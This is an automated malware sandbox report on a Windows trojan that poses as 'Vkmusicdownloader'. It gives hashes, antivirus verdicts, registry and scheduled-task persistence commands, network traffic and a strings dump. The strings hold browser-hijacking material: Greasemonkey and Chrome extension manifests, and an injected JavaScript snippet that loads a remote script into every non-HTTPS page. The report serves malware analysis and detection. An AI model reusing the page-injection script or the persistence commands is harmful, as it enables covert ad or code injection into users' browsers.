Analysis Date2015-02-01 05:54:23
MD5a1bfa2c1eb2aaab89dfd5284fafa6d20
SHA1d7d40b952fe1dc80b49fc82cb4b3bb2ade1172a2

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 02b954386befcbd704b0b7372db31cf5 sha1: c35bac9d449d008b35f940808ed9eab3b761bbe7 size: 181760
Section.rdata md5: 3e6dfbc881b625879e5f73d365554155 sha1: 3b20993407a7ff3afb12b2472813981876aa7f95 size: 51200
Section.data md5: 078440e14fce15cb69d6b052da4a28a4 sha1: 3820a61be23302ab3fe1c6f870f41307f56be11d size: 8192
Section.rsrc md5: 11fa5ba1e2fc7a4c8957bd01b7426c3d sha1: e3e56297a9dbcb8868e04029b2be61c26e8df5eb size: 16384
Section.reloc md5: 129ac826c7439767197455afb4397931 sha1: f17aeed9b669446ca57f2082adcb2262241afcb8 size: 10752
Timestamp2015-01-22 11:19:01
PackerMicrosoft Visual C++ 8
PEhashf4dda603c674292171e7f67cfcb94671b4003159
IMPhash0da04b85b7d70a3b23e8decf270c6978
AV360 Safeno_virus
AVAd-AwareGen:Variant.Graftor.166220
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)Gen:Variant.Graftor.166220
AVAuthentiumW32/Trojan.BBWR-1475
AVAvira (antivir)TR/Agent.269312.59
AVBullGuardGen:Variant.Graftor.166220
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftGen:Variant.Graftor.166220
AVEset (nod32)Win32/Agent.WPP
AVFortinetW32/Agent.WPP!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Variant.Graftor.166220
AVGrisoft (avg)Win32/DH{gRJ8gQ4PICUT}
AVIkarusTrojan.Win32.Agent
AVK7Trojan ( 0048a4bc1 )
AVKasperskyTrojan.Win32.Agentb.bmpi
AVMalwareBytesno_virus
AVMcafeeRDN/Generic.dx!d2p
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Variant.Graftor.166220
AVRisingno_virus
AVSophosno_virus
AVSymantecTrojan.Gen.2
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vkmusicdownloader ➝
"C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe"
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vkmusicdownloader ➝
"C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe"
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Vkmusicdownloader\DisplayName ➝
Vkmusicdownloader
Creates FileC:\malware.exe.cmd
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe
Creates FilePIPE\lsarpc
Creates ProcessC:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f
Creates ProcessC:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f
Creates ProcessC:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f
Creates ProcessC:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f
Winsock URLhttp://yandex.ru

Process
↳ C:\WINDOWS\system32\cmd.exe

Process
↳ C:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f

Creates FilePIPE\lsarpc

Process
↳ C:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f

Creates ProcessC:\WINDOWS\system32\drwtsn32 -p 268 -e 144 -g

Process
↳ C:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f

Creates FilePIPE\lsarpc

Process
↳ C:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 268 -e 144 -g

Network Details:

DNSyandex.ru
Type: A
213.180.193.11
DNSyandex.ru
Type: A
213.180.204.11
DNSyandex.ru
Type: A
93.158.134.11
HTTP GEThttp://yandex.ru/
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 213.180.193.11:80

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   486f7374 3a207961 6e646578 2e72750d   Host: yandex.ru.
0x00000020 (00032)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000030 (00048)   6e6f2d63 61636865 0d0a0d0a            no-cache....


Strings
.
..
......... ! "#"$%"&*(+,&./&.012/3453/68;<=>;?@?A?/B/& DE FHILMNLOLPH
.....
........... "#$%$"&
'('*+,-+.+'&/
01236&78"..<=>?@<.BCDEFGEDCIJIKLMNLIORPSTUSVWV
=
.
-.
0
R...
%+#
%+#4
 
  
.
00-+ 
\
-
-1
+-0-E-
-0
0
0.
- 
000.
e
. 
"u
jR.
                                 
2CONOUT$
- abort() has been called
af-za
af-ZA
america
american
american english
american-english
amigo.exe
April
ar-ae
ar-AE
ar-bh
ar-BH
ar-dz
ar-DZ
ar-eg
ar-EG
ar-iq
ar-IQ
ar-jo
ar-JO
ar-kw
ar-KW
ar-lb
ar-LB
ar-ly
ar-LY
ar-ma
ar-MA
ar-om
ar-OM
ar-qa
ar-QA
ar-sa
ar-SA
ar-sy
ar-SY
ar-tn
ar-TN
ar-ye
ar-YE
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
australian
az-az-cyrl
az-AZ-Cyrl
az-az-latn
az-AZ-Latn
be-by
be-BY
belgian
bg-bg
bg-BG
BLC_ALL
bn-in
bn-IN
britain
browser.exe
bs-ba-latn
bs-BA-Latn
ca-es
ca-ES
canadian
CCHN
CCHS
CCHT
CCZE
CDEA
CDEC
CDEL
CDES
CENA
CENB
CENC
CENG
CENI
CENJ
CENL
CENS
CENT
CENU
CENZ
CESA
CESB
CESC
CESD
CESE
CESF
CESG
CESH
CESI
CESL
CESM
CESN
CESO
CESR
CESS
CESU
CESV
CESY
CESZ
CFRB
CFRC
CFRL
CFRS
CGBR
china
chinese
chinese-hongkong
chinese-simplified
chinese-singapore
chinese-traditional
CHKG
chrome.exe
CHROME_MANIFEST_JSON
CHROME_PLUG_JSON
CITS
CKOR
Cmscoree.dll
CNLB
CNLD
CNON
CNOR
CNZL
CPRI
CPTB
CR6002
- CRT not initialized
cs-cz
cs-CZ
CSVF
CSVK
CTTO
CUSA
cy-gb
cy-GB
CZAF
czech
CZHH
CZHI
da-dk
da-DK
dddd, MMMM dd, yyyy
de-at
de-AT
December
de-ch
de-CH
de-de
de-DE
DEF_URL_TXT
de-li
de-LI
de-lu
de-LU
div-mv
div-MV
DOMAIN error
dutch-belgian
Eccs
el-gr
el-GR
eMOZILLA_PLUG_INSTALL_CACHE
en-au
en-AU
en-bz
en-BZ
en-ca
en-CA
en-cb
en-CB
en-gb
en-GB
england
english-american
english-aus
english-belize
english-can
english-caribbean
english-ire
english-jamaica
english-nz
english-south africa
english-trinidad y tobago
english-uk
english-us
english-usa
en-ie
en-IE
en-jm
en-JM
en-nz
en-NZ
en-ph
en-PH
en-tt
en-TT
en-us
en-US
en-za
en-ZA
en-zw
en-ZW
es-ar
es-AR
es-bo
es-BO
es-cl
es-CL
es-co
es-CO
es-cr
es-CR
es-do
es-DO
es-ec
es-EC
es-es
es-ES
es-gt
es-GT
es-hn
es-HN
es-mx
es-MX
es-ni
es-NI
es-pa
es-PA
es-pe
es-PE
es-pr
es-PR
es-py
es-PY
es-sv
es-SV
es-uy
es-UY
es-ve
es-VE
et-ee
et-EE
eu-es
eu-ES
fa-ir
fa-IR
February
fi-fi
fi-FI
firefox.exe
- floating point support not loaded
fo-fo
fo-FO
fr-be
fr-BE
fr-ca
fr-CA
fr-ch
fr-CH
french-belgian
french-canadian
french-luxembourg
french-swiss
fr-fr
fr-FR
Friday
fr-lu
fr-LU
fr-mc
fr-MC
german-austrian
german-lichtenstein
german-luxembourg
german-swiss
gl-es
gl-ES
great britain
gu-in
gu-IN
         (((((                  H
he-il
he-IL
HH:mm:ss
hi-in
hi-IN
holland
hong-kong
hr-ba
hr-BA
hr-hr
hr-HR
hu-hu
hu-HU
hy-am
hy-AM
id-id
id-ID
IMAGE
- inconsistent onexit begin-end variables
irish-english
is-is
is-IS
italian-swiss
it-ch
it-CH
it-it
it-IT
ja-jp
ja-JP
January
July
June
ka-ge
ka-GE
kernel32.dll
kk-kz
kk-KZ
kn-in
kn-IN
kok-in
kok-IN
ko-kr
ko-KR
ky-kg
ky-KG
LC_COLLATE
LC_CTYPE
LC_MONETARY
LC_NUMERIC
LC_TIME
lt-lt
lt-LT
lv-lv
lv-LV
lWINDOWS_ZPX
March
Microsoft Visual C++ Runtime Library
mi-nz
mi-NZ
mk-mk
mk-MK
ml-in
ml-IN
MM/dd/yy
mn-mn
mn-MN
Monday
MOZILLA_PLUG_ADDONS
MOZILLA_PLUG_INSTALL_CACHE
mr-in
mr-IN
ms-bn
ms-BN
ms-my
ms-MY
mt-mt
mt-MT
nb-no
nb-NO
new-zealand
nl-be
nl-BE
nl-nl
nl-NL
nn-no
nn-NO
norwegian
norwegian-bokmal
norwegian-nynorsk
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
ns-za
ns-ZA
(null)
October
opera.exe
pa-in
pa-IN
pl-pl
pl-PL
portuguese-brazilian
pr china
pr-china
Program: 
<program name unknown>
pt-br
pt-BR
pt-pt
pt-PT
puerto-rico
- pure virtual function call
quz-bo
quz-BO
quz-ec
quz-EC
quz-pe
quz-PE
R6008
R6009
R6010
R6016
R6017
R6018
R6019
R6024
R6025
R6026
R6027
R6028
R6030
R6031
R6032
R6033
R6034
REF_URL_TXT
REFU_URL_TXT
ro-ro
ro-RO
runtime error 
Runtime Error!
ru-ru
ru-RU
sa-in
sa-IN
Saturday
se-fi
se-FI
se-no
se-NO
September
se-se
se-SE
SING error
sk-sk
sk-SK
slovak
sl-si
sl-SI
sma-no
sma-NO
sma-se
sma-SE
smj-no
smj-NO
smj-se
smj-SE
smn-fi
smn-FI
sms-fi
sms-FI
south africa
south-africa
south korea
south-korea
spanish-argentina
spanish-bolivia
spanish-chile
spanish-colombia
spanish-costa rica
spanish-dominican republic
spanish-ecuador
spanish-el salvador
spanish-guatemala
spanish-honduras
spanish-mexican
spanish-modern
spanish-nicaragua
spanish-panama
spanish-paraguay
spanish-peru
spanish-puerto rico
spanish-uruguay
spanish-venezuela
sq-al
sq-AL
sr-ba-cyrl
sr-BA-Cyrl
sr-ba-latn
sr-BA-Latn
sr-sp-cyrl
sr-SP-Cyrl
sr-sp-latn
sr-SP-Latn
Sunday
sv-fi
sv-FI
sv-se
sv-SE
swedish-finland
swiss
sw-ke
sw-KE
syr-sy
syr-SY
ta-in
ta-IN
te-in
te-IN
TEXT
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
th-th
th-TH
Thursday
TLOSS error
tn-za
tn-ZA
tREFU_URL_TXT
trinidad & tobago
tr-tr
tr-TR
tt-ru
tt-RU
Tuesday
uk-ua
uk-UA
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UNICODE
UNINST_TITLE_TXT
united-kingdom
united-states
ur-pk
ur-PK
USER32.DLL
UTF-16LE
UTF-8
uz-uz-cyrl
uz-UZ-Cyrl
uz-uz-latn
uz-UZ-Latn
vi-vn
vi-VN
Wednesday
WINDOWS_ZPX
xh-za
xh-ZA
zh-chs
zh-CHS
zh-cht
zh-CHT
zh-cn
zh-CN
zh-hk
zh-HK
zh-mo
zh-MO
zh-sg
zh-SG
zh-tw
zh-TW
zu-za
zu-ZA
                          
: :$:(:
			}, 
				}], 
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0
0 000<0\0d0l0x0
0$000P0`0h0p0x0
0 0'030:0F0M0Y0`0l0s0
0$0,040<0D0L0T0\0d0l0t0|0
0%010=0I0U0a0m0y0
0;0D0M0
0$0h0t0
'0@0Q0{0
0<1^1/2N2
0123456789ABCDEF
0123456789abcdefABCDEF
0123456789abcdefghijklmnopqrstuvwxyz
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
031O1]1g1
= =$=(=,=0=4=8=<=@=D=H=T=X=\=`=d=h=l=p=t=x=|=
? ?$?(?,?0?4?8?@?X?h?
=0=4=D=H=`=d=h=l=t=
= =(=0=8=@=H=
< <(<0<8<@<H<P<X<`<h<p<x<
; ;(;0;8;@;H;P;X;`;h;p;x;
: :(:0:8:@:H:P:X:`:h:p:x:
<(<0<8<@<L<l<x<
090@0}0
0A0N0^0
<0|m<9
0o0,2M4
=(=0=P=l=|=
:0:P:l:p:
;0uA9E
=&=,=1===
\1.0_0
1 1$1(1,1
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
1$1,141<1D1L1T1\1d1l1t1|1
1$1*191m1x1
1 1@1H1P1X1d1
1(1H1T1\1
1<1Y1x122<2W2o2
12171=1C1Q1W1s1}1
1"2,2G2M2^2l2
1&2A2^2
142A2Q2}2
=1=6=x=
1`7d7h7p7
;1<h<j=s=
1p9X=\=t=x=|=
1#QNAN
1#SNAN
1v2X4y4
1W1o1y1
1Z2l2~2
2$202P2\2d2|2
2 2(202<2\2d2l2t2|2
2"2&2+21252;2?2E2I2N2T2X2^2b2h2l2r2v2
2 2$2(2,2024282<2@2D2
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2p2t2x2|2
2$2,242<2D2L2T2\2d2l2t2|2
2 2(242T2`2
2)323E3d3w3
2'3B3N3]3f3s3
2;3F3c3
2&3H4P4
2D7L7T7\7d7l7t7|7
2E2x9~9
\$2h$UC
=2>i>v>
?%?,?2?<?k?s?z?
2p2%353N3_3{3
303l3}3
3$303<3H3T3`3l3x3
3 3(3,30383L3T3`3
3 3$3,3D3T3X3h3l3p3t3|3
3$3,343<3D3L3T3\3d3l3t3|3
3"343F3a3g3
3*3E3S3b3n3r3y3}3
3?3H3~3
3<3H3h3p3x3
3'3L3n3
3 404<4D4x4
3;4F4V4
3,4G4\4i4v4
3%4N4h4p4{4
!&/(=:34NI@GRU\[vqx
3/4U4i4t4
393Q3\3n3
?3?A?K?
3G3\3j3s3
:#;3;H;T;
3lY!Bv
3O3\3p3
3R3]3o3
>(>4>@>
425d5v5
4(40484@4H4P4X4d4
4!41474F4M4]4c4i4q4w4}4
4 4(40484D4M4R4X4b4l4|4
4$4,444<4D4L4T4\4d4l4t4|4
4#4(4.464;4A4I4N4T4\4a4g4o4t4z4
4%4+4=4N4h4u4
4,4<4@4P4T4d4h4l4t4
4 4,484D4P4\4h4t4
4#4>4T4g4
4(474F4Q4[4e4o4y4
4/5:5@5g5
4,5|5B6Z6p6
4'5C5w5
4.5o5X6e6/7h7
4%5V5c5l5
484D4`4
485B5]5g5
;$;(;,;4;8;<;@;D;H;L;P;T;h;l;
>4>8><>@>D>X>\>l>p>t>
; ;$;(;,;4;8;@;T;\;p;x;
4A4q4$5A6c6n6
>4>B>L>
;$;,;4;<;D;L;T;\;d;l;t;|;
:$:,:4:<:D:L:T:\:d:l:t:|:
?$?,?4?<?D?L?T?\?d?l?t?|?
:4:<:D:L:X:x:
=4=@=H=`=
:$:,:4:<:L:T:\:d:l:t:|:
>(>4><>p>
4T5h5o5v5
> >(>4>T>\>h>
4Y4y647E7
51D1R1
' ).;<52
545O5r5
5$505P5X5`5h5t5
5(545@5L5X5d5p5|5
5 54585<5T5X5p5
5 5(50585@5H5T5t5|5
5%5-52585@5E5K5S5X5^5f5k5q5y5~5
5$5,545<5D5L5T5\5d5l5t5|5
5 5'5/575?5J5O5U5_5i5|5
5 5@5H5L5h5p5t5
5(5>5Q5g5p5|5
5 5F5L5k5q5
5$6(60686@6D6L6`6
5	6&6=6
5%6*6O6d6j6s6
5?6M6W6R7
58=D=P=\=h=t=
<%<5<F<N<
<)=5=Q=
5U5v5{5
5W6`6h6
646(7h7
6 60686T6\6d6l6t6|6
6,606H6L6P6X6p6
6%616?6P6V6\6c6q6
6)61696
6$6,60686@6H6P6X6`6h6p6x6
6$6)6.676<6B6J6P6^6l6z6
6$6,686\6d6l6t6|6
6 6O6f6}6
6:6U6p6
6"7-737
6)7>7{7
6$7,787G7
6:7>7B7F7J7N7R7V7Z7^7
6<7V7c7
:6:B:j:
747`7z7
759S9l9s9{9
7,747<7D7\7d7l7t7|7
7 7(70787@7H7P7X7`7h7p7x7
7$7,747<7D7L7T7\7d7l7t7|7
7$7,747<7H7h7p7x7
7 7$74787P7T7l7|7
7 7@7L7h7t7
7-7P7Y7c7
7%878@8G8U8[8b8u8
7^8i8|8
<#=7=>=b=
7B8J8]8h8m8}8
%7Be4a8a97b-f2ed-450b-b12d-ee082ba24782%7D:0.9.1
7F9J9N9R9V9Z9^9b9
;7<J<d<~<
<7<P<e<}<
7Z8c8m8
80<0@0D0H0L0P0T0X0\0`0d0
80<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
8?61$#*-pw~ylkbeHOFATSZ]
8 8(80888@8H8P8X8`8h8p8x8
8$8,848<8D8L8T8\8d8l8t8|8
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
8 8$888H8L8\8`8x8|8
8 8$8(8Q8w8
8=8b8h8
8$8D8O8o8z8
8(8H8h8
8(8H8P8X8d8
8(8H8t8
8.949I9
8!9)9G9O9o9w9
8$9C9b9
8F9`9p9
?(?8?H?T?t?|?
8R9[9g:p:\;
|$8 s5Rj
;,;8;X;d;
<8<z<9=
91:8:<:@:D:H:L:P:T:
919<9B9I9W9]9f9
979L9R9
989D9L9d9l9
9$90989T9\9d9l9t9|9
9 9(90989@9H9P9X9`9h9p9x9
9$9,949<9D9L9T9\9d9l9t9|9
9!9*969>9H9q9
9 9$9(9,9094989<9@9D9
9,9<9@9D9\9`9d9h9|9
9$9(9H9h9
9,9L9l9
9D$ u 
9D$$u7
>/>9>]>g>~>
9M;m={=
;!;/;9;?;S;_;
~,9~$t	
> ?9?t?
a3qJ?dZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
	"aboutURL" : null, 
	"active_permissions": { 
		["activeTab", "tabs"], 
	"active" : true, 
additional six characters expected to parse unicode surrogate pair.
addons
			"addons":
address family not supported
address_family_not_supported
address in use
address_in_use
address not available
address_not_available
ADVAPI32.dll
already connected
already_connected
Always Load User JavaScript
\Amigo\User Data\Default
		"api":
			"api":["activeTab", "tabs"], 
	"appDisabled" : false, 
	"applyBackgroundUpdates" : 1, 
AreFileApisANSI
argument list too long
argument out of domain
</assembly>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<at-<rt"<wt
.?AUctype_base@std@@
August
A valid JSON document must be either an array or an object value.
.?AVbad_alloc@std@@
.?AVbad_cast@std@@
.?AVbad_exception@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ifstream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$basic_iostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ofstream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_stringbuf@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AVcodecvt_base@std@@
.?AV?$codecvt@DDH@std@@
.?AV?$ctype@D@std@@
.?AVerror_category@std@@
.?AVexception@std@@
.?AV_Facet_base@std@@
.?AVfacet@locale@std@@
.?AVfailure@ios_base@std@@
.?AVFastWriter@Json@@
.?AV_Generic_error_category@std@@
.?AVios_base@std@@
.?AV?$_Iosb@H@std@@
.?AV_Iostream_error_category@std@@
.?AVlength_error@std@@
.?AV_Locimp@locale@std@@
.?AVlogic_error@std@@
.?AV?$numpunct@D@std@@
.?AV?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AVout_of_range@std@@
.?AVruntime_error@std@@
.?AVStyledWriter@Json@@
.?AV_System_error_category@std@@
.?AVsystem_error@std@@
.?AV_System_error@std@@
.?AVtype_info@@
.?AVWriter@Json@@
\background.js
bad address
bad_address
bad allocation
bad cast
Bad escape sequence in string
bad exception
bad file descriptor
bad_file_descriptor
bad locale name
bad message
Bad unicode escape sequence in string: four digits expected.
Bad unicode escape sequence in string: hexadecimal digit expected.
 Base Class Array'
 Base Class Descriptor at (
__based(
bdb`a``
bdb`f``
<'=B=g=
:b:h:l:p:t:
	"bootstrap" : false, 
broken pipe
Browser will be closed for continue. Agree?
>B>u>{>
(c:0~C.
C8Wpt_9WdtZQ
CD$@)|$
__cdecl
CD$ QP
CharToOemA
chrome.manifest
chrome.manifestPK
chrome/PK
 Class Hierarchy Descriptor'
CloseHandle
CloseThreadpoolTimer
CloseThreadpoolWait
__clrcall
:c;l;v;
CompareStringEx
 Complete Object Locator'
components/gmIBrowserWindow.xpt
components/gmIBrowserWindow.xptPK
components/gmIGreasemonkeyService.xpt
components/gmIGreasemonkeyService.xptPK
components/gmIMenuCommand.xpt
components/gmIMenuCommand.xptPK
components/greasemonkey.js
components/greasemonkey.jsPK
components/PK
COMSPEC
\config.xml
connection aborted
connection_aborted
connection already in progress
connection_already_in_progress
connection refused
connection_refused
connection reset
connection_reset
\contentscript.js
				"content_scripts":[{ 
{\"content_scripts\": [ { \"js\": [ \"contentscript.js\" ], \"matches\": [ \"http://*/*\", \"https://*/*\" ], \"run_at\": \"document_start\" } ],\"description\": \"
\content.user.js
		"contributors" : []
ConvertSidToStringSidW
`copy constructor closure'
CopyFileA
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
CorExitProcess
CreateDirectoryA
CreateEventA
CreateEventExW
CreateFile2
CreateFileA
CreateFileW
CreateSemaphoreExW
CreateSymbolicLinkW
CreateThreadpoolTimer
CreateThreadpoolWait
/create /tn ss /tr "DWVALUE" /sc ONLOGON /f
CreateToolhelp32Snapshot
	"creation_flags" : 9, 
		"creator" : "",
/c rmdir /s /q "
cross device link
CryptAcquireContextW
CryptCreateHash
CryptGetHashParam
CryptHashData
>Cu/f9F
;C<X<h<p<
D$0SVW
D$8jlP
@.data
dddd, MMMM dd, yyyy
December
DecodePointer
`default constructor closure'
	"defaultLocale" : 
defaults/PK
defaults/preferences/greasemonkey.js
defaults/preferences/greasemonkey.jsPK
defaults/preferences/PK
 delete
 delete[]
DeleteCriticalSection
DeleteFileA
/delete /tn ss /f
del /q "%s"
deque<T> too long
		"description" : "", 
				"description" : "", 
					"descriptor":"EXT_FILE",
	"descriptor" : "PATH", 
destination address required
destination_address_required
DeviceIoControl
device or resource busy
D$HSVW
directory not empty
DisplayName
:!:D:I:U:Z:y:
D$ j@P
D$$j@P
D$@j.Xf
;,;<;D;L;T;t;|;
=?=D=M=}=
double out of Int64 range
double out of UInt64 range
D$ RPS
D$ RPW
D$`SVW
D$ SVW
D$(SVW
D$@SVW
<(<,<D<T<X<p<
d|vxz~
DWVALUE
`dynamic atexit destructor for '
`dynamic initializer for '
{e4a8a97b-f2ed-450b-b12d-ee082ba24782}
				"{e4a8a97b-f2ed-450b-b12d-ee082ba24782}":
__eabi
@echo off
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
Empty escape sequence in string
enabled
Enable Trust Rating
EncodePointer
EnterCriticalSection
EnumSystemLocalesEx
EnumSystemLocalesW
EnumWindows
executable format error
ExitProcess
expecting another \u token to begin the second half of a unicode surrogate pair
\Extension Data
extensions
\extensions
extensions.
\Extensions\
extensions.enabledAddons
extensions.installCache
\extensions.json
extensions.known_disabled
extensions.settings.
EXT_FILE
F@9^8u
__fastcall
February
FH;FDu
file exists
filename too long
filename_too_long
file too large
FindClose
FindFirstFileA
FindNextFileA
FindResourceW
 flash-
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FlushProcessWriteBuffers
	"foreignInstall" : false, 
FreeEnvironmentStringsW
FreeLibraryWhenCallbackReturns
FreeResource
Friday
	"from_bookmark" : true, 
	"from_webstore" : true, 
(function(d){if(d.location.protocol=='https:')exit;ourdom='HTTP';var t=new Date();t=t.getDate()+t.getMonth()+t.getFullYear();var s=d.createElement('script');s.src=ourdom+'&rnd='+t;try{d.body.appendChild(s);}catch(e){var i=setInterval(function(){if(typeof d.body!=='undefined'){d.body.appendChild(s);clearInterval(i);};},50);}})(document);
function not supported
G<0|l<9
G0Pj.S
G4Pj/S
G8PjDS
GDPjGS
GdPjOS
generic
GetACP
GetActiveWindow
GetCommandLineA
GetComputerNameW
GetConsoleCP
GetConsoleMode
GetCPInfo
GetCurrentPackageId
GetCurrentProcess
GetCurrentProcessId
GetCurrentProcessorNumber
GetCurrentThreadId
GetDateFormatEx
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesA
GetFileInformationByHandleExW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoEx
GetLocaleInfoW
GetLogicalProcessorInformation
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleExW
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoW
GetStdHandle
GetStringTypeW
GetSystemDirectoryW
GetSystemTimeAsFileTime
GetTickCount64
GetTimeFormatEx
GetUserDefaultLCID
GetUserDefaultLocaleName
GetUserObjectInformationW
GetVolumeInformationW
GetWindowLongW
GetWindowThreadProcessId
GH;GDu
GhPj8S
GHPjHS
G j?Y+
GlPj9S
GLPjIS
\gmr_scripts
\Google\Chrome\User Data\Default
G<PjES
G@PjFS
G\PjMS
G`PjNS
G|Pj=S
G Pj*S
G,Pj-S
G(Pj,S
G$Pj+S
GPPjJS
GpPj:S
	"granted_permissions" : { 
GTPjKS
GtPj;S
><>g>v>
;'<G<V<
GXPjLS
GxPj<S
`h````
	"hasBinaryComponents" : false, 
='=/=H=[=c=
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
`h`hhh
HH:mm:ss
HHtVHHt
		"homepageURL" : "http://www.greasespot.net/", 
host unreachable
host_unreachable
Ht7Ht0Ht
Ht]HtFHt
Ht+Ht$Ht
http://get.adobe.com/flashplayer
}http://pozitivrekl.ru/alexander.php?snid=
https://clients2.google.com/service/update2/crx
http://yandex.ruVkmusicdownloader
:H:X:m:
_hypot
=I>|>0?v?
	"icon64URL" : null, 
	"iconURL" : "chrome://greasemonkey/skin/icon_medium.png", 
	"id":"{e4a8a97b-f2ed-450b-b12d-ee082ba24782}", 
			"id":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}", 
identifier removed
if exist "%s" goto c
Ignore Target
Ignore Unrequested Popups
illegal byte sequence
inappropriate io control operation
// @include http://*
// @include https://*
ing`ur{|QV_XMJCD
InitializeCriticalSectionAndSpinCount
InitializeCriticalSectionEx
		"initial_keybindings_set" : true, 
in Json::Value::asCString(): requires stringValue
in Json::Value::clear(): requires complex value
in Json::Value::duplicateStringValue(): Failed to allocate string value buffer
in Json::Value::getMemberNames(), value must be objectValue
in Json::Value::operator[](ArrayIndex)const: requires arrayValue
in Json::Value::operator[](ArrayIndex): requires arrayValue
in Json::Value::operator[](char const*)const: requires objectValue
in Json::Value::operator[](int index) const: index cannot be negative
in Json::Value::operator[](int index): index cannot be negative
in Json::Value::removeMember(): requires objectValue
in Json::Value::resolveReference(): requires objectValue
in Json::Value::setComment(): Comments must start with /
